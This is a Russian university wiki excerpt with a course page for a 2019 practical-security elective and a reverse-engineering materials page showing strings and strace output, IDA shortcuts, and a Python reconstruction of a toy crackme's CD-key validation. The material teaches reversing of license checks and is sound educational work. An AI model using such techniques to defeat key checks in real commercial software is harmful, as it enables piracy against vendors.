| [[enter (клавиша)|enter]]
| [[клавиша ввода|enter]] = ↵ [[Клавиша ввода|Enter]]
| cmd = ⌘ Cmd
| [[cmd (клавиша)|cmd]]
| [[command (клавиша)|cmd]] = ⌘ [[Command (клавиша)|Cmd]]
| command = ⌘ Command
| [[cmd (клавиша)|command]]
| [[command (клавиша)|command]] = ⌘ [[Command (клавиша)|Command]]
| opt = ⌥ Opt
| [[option (клавиша)|opt]] = ⌥ [[Option (клавиша)|Opt]]
| option = ⌥ Option
| [[opt (клавиша)|option]]
| [[option (клавиша)|option]] = ⌥ [[Option (клавиша)|Option]]
| tab|табуляция = Tab ↹
| [[табуляция|tab]] = [[Табуляция|Tab]] ↹
| backspace = ← Backspace
| [[backspace]] = ← [[Backspace]]
| win = ⊞ Win
| [[win (клавиша)|win]]
| [[windows (клавиша)|win]] = ⊞ [[Windows (клавиша)|Win]]
| menu|меню = ≣ Menu
| [[меню (клавиша)|menu]] = ≣ [[Меню (клавиша)|Menu]]
| up|вверх = ↑
| [[клавиши управления курсором|up]] = [[Клавиши управления курсором|↑]]
| down|вниз = ↓
| [[клавиши управления курсором|down]] = [[Клавиши управления курсором|↓]]
| left|влево = ←
| [[клавиши управления курсором|left]] = [[Клавиши управления курсором|←]]
| right|вправо = →
| [[клавиши управления курсором|right]] = [[Клавиши управления курсором|→]]
| *
| asterisk|астериск = <nowiki>*</nowiki>
| #
| hash|знак решётки|решётка = <nowiki>#</nowiki>
| [[#]] = [[Знак решётки|#]]
| :
| colon|двоеточие = <nowiki>:</nowiki>
| [[:]] = [[Двоеточие|:]]
| pipe|вертикальная черта = <nowiki>|</nowiki>
| [[|]] = [[Вертикальная черта|<nowiki>|</nowiki>]]
| ;
| semicolon|точка с запятой = <nowiki>;</nowiki>
| [[;]] = [[Точка с запятой|<nowiki>;</nowiki>]]
| equals|равенство|равно = <nowiki>=</nowiki>


| l-up | л-вверх
| l up | л вверх = L↑
| l-down | л-вниз
| l down | л вниз = L↓
| l-left | л-влево
| l left | л влево = L←
| l-right | л-вправо
| l right | л вправо = L→
| l-ne | л-св
| l ne | л св = L↗
| l-se | л-юв
| l se | л юв = L↘
| l-nw | л-сз
| l nw | л сз = L↖
| l-sw | л-юз
| l sw | л юз = L↙

| r-up | п-вверх
| r up | п вверх = R↑
| r-down | п-вниз
| r down | п вниз = R↓
| r-left | п-влево
| r left | п влево = R←
| r-right | п-вправо
| r right | п вправо = R→
| r-ne | п-св
| r ne | п св = R↗
| r-se | п-юв
| r se | п юв = R↘
| r-nw | п-сз
| r nw | п сз = R↖
| r-sw | п-юз
| r sw | п юз = R↙


| ps x
| ex = ×
| ps c
| circle = ○
| ps s
| square = □
| ps t
| triangle = △


| c-up | ц-вверх
| c up | ц вверх = C↑
| c-down | ц-вниз
| c down | ц вниз = C↓
| c-left | ц-влево
| c left | ц влево = C←
| c-right | ц-вправо
| c right | ц вправо = C→
| c-ne | ц-св
| c ne | ц св = C↗
| c-se | ц-юз
| c se | ц юз = C↘
| c-nw | ц-сз
| c nw | ц сз = C↖
| c-sw | ц-юз
| c sw | ц юз = C↙


| #default = {{{1}}}
}}</kbd>

Введение в практическую безопасность (2019)

2019-03-13T11:02:11Z

WGH: /* Материалы */

'''Введение в практическую безопасность''' — математический спецкурс по выбору, читается лабораторией интеллектуальных систем кибербезопасности (ЛИСК) кафедры информационной безопасности (ИБ) факультета ВМК.

* '''Когда''': каждый вторник, 18:05, с 12 февраля 2019
* '''Где''': аудитория 685, 2-й учебный корпус, планета Земля, Млечный Путь.
* '''Чат''': https://t.me/joinchat/B4hXs1Z5I6qEtns9fjgbfg или Matrix [https://matrix.to/#/#7fZs5vxGhmxS5KPHDTatYQ:torlan.ru #7fZs5vxGhmxS5KPHDTatYQ:torlan.ru]

Курс рекомендуется студентам, интересующимся практической безопасностью, в особенности — студентам 2-го курса, планирующим распределиться в лабораторию. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты на курсе:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания вместе дадут '''3000'''. Гарантируется, что 3000 и больше будут давать оценку "отлично". Большая часть заданий будет выполнена в формате ctf-тасков<ref>Кстати, у нас есть CTF-команда [[Bushwhackers]], приглашаем вас поиграть с нами!</ref>.

== Задания ==

* [[Введение_в_практическую_безопасность_(2019)/Задания_по_вебу|Задания по вебу]]

== Материалы ==

* [[Введение_в_практическую_безопасность_(2019)/HTTP,_инструменты_%26_SQL_injection|HTTP, инструменты и SQL injection]] - по теме первого занятия по веб-безопасности
* [[/Реверс-инжиниринг|Реверс-инжиниринг]]

== Примечания ==
<references/>

Введение в практическую безопасность (2019)/Реверс-инжиниринг

2019-03-13T11:00:06Z

WGH: Новая страница: «== strings == Выводит константные строки, которые есть в бинарнике. Строки определяются эврис…»

== strings ==

Выводит константные строки, которые есть в бинарнике. Строки определяются эвристикой, поэтому часто бывают ложные срабатывания. IDA тоже умеет определять строки.

<pre>
$ strings reverse_example_1
/lib64/ld-linux-x86-64.so.2
libcrypto.so.1.0.0
_ITM_deregisterTMCloneTable
/lib64/ld-linux-x86-64.so.2
libcrypto.so.1.0.0
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
MD5_Final
MD5_Init
MD5_Update
libc.so.6
fopen
__stack_chk_fail
fgets
malloc
stderr
fwrite
__sprintf_chk
__libc_start_main
free
GLIBC_2.3.4
GLIBC_2.4
GLIBC_2.2.5
OPENSSL_1.0.0
D$(1
T$(dH3
AUATH
D$h1
|$hdH3<%(
x[]A\A]
AWAVA
AUATL
[]A\A]A^A_
%02X
./cd-key.txt
failed to open CD key file
failed to read CD key file
invalid cdkey
Good job!
;*3$"
.shstrtab
.interp
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
</pre>

== strace ==

Выводит трассу системных вызовов. Полезно, чтобы определить, какие файлы читает программа, и как вообще взаимодействует с внешним миром (в том числе сеть).

<pre>
$ strace ./reverse_example_1
...
openat(AT_FDCWD, "./cd-key.txt", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=24, ...}) = 0
read(3, "AAAAA-BBBBB-CCCCC-DDDDD\n", 4096) = 24
write(2, "invalid cdkey\n", 14) = 14
exit_group(1) = ?
</pre>

== IDA Pro ==

Интерактивный дизассемблер и декомпилятор.

=== Шорткаты ===
<center style="font-size: 500%">
{{клавиша|F5}}
</center>
==== IDA ====
* {{клавиша|P}} — создать функцию, начиная с текущей позиции курсора
* {{клавиша|F5}} — декомпилировать функцию
* {{клавиша|Enter}} — проследовать по курсору (например, перейти к функции или массиву)
* {{клавиша|Esc}} — назад (противоположность {{клавиша|Enter}})
* {{клавиша|X}} — показать ссылки на то, что под курсором (на функцию, переменную, строку, etc.)
* {{клавиша|C}} — переопределить байты, начиная с курсора, как код.
* {{клавиша|D}} — переопределить байты, начиная с курсора, как данные (последовательные нажатия переключают размер переменной byte-word-dword(-qword))
* {{клавиша|A}} — переопределить байты, начиная с курсора, как строку
* {{клавиша|R}} — переопределить число в инструкции как строку (<code>mov rdx, 335F47414C465Fh</code> -> <code>mov rdx, '3_GALF_'</code>)
Неплохой [https://radare.gitbooks.io/radare2book/content/debugger/migration.html#shortcuts список] из доков по radare2.

==== Hex-Rays ====
* {{клавиша|N}} — переименовать
* {{клавиша|Y}} — поменять тип
** Может показаться, что с помощью {{клавиша|Y}} можно и переименовать, или с помощью {{клавиша|N}} задать тип, однако это не так
* {{клавиша|Enter}} — проследовать по курсору
* {{клавиша|Esc}} — назад
* {{клавиша|Tab}} — перейти к данному месту из декомпилированного в дизассемблированный код и обратно

[https://www.hex-rays.com/products/decompiler/manual/interactive.shtml Полный список] на официальном сайте.

== Примеры с занятия ==

Бинарники, которые были рассмотрены на семинаре: [[Media:2019 reverse examples.zip]].

Исходник первого примера: [[Media:2019 reverse example 1.c]]

Алгоритм проверки ключа на Python:
<pre>
import string
import hashlib

def validate_key(s):
if len(s) != 23:
return False

for i, c in enumerate(s):
if i in (5, 11, 17):
if c != '-':
return False
else:
if c not in (string.ascii_uppercase + string.digits):
return False

m = hashlib.md5()
m.update(s[:17].encode('ascii'))
m.update(bytes([0x4d,0x67,0xde,0xb9,0x60,0xce,0x38,0x30,0xe1,0xb7,0x40,0xe5,0xeb,0x39,0xe0,0x15]))

return s[18:] == m.hexdigest()[:5].upper()
</pre>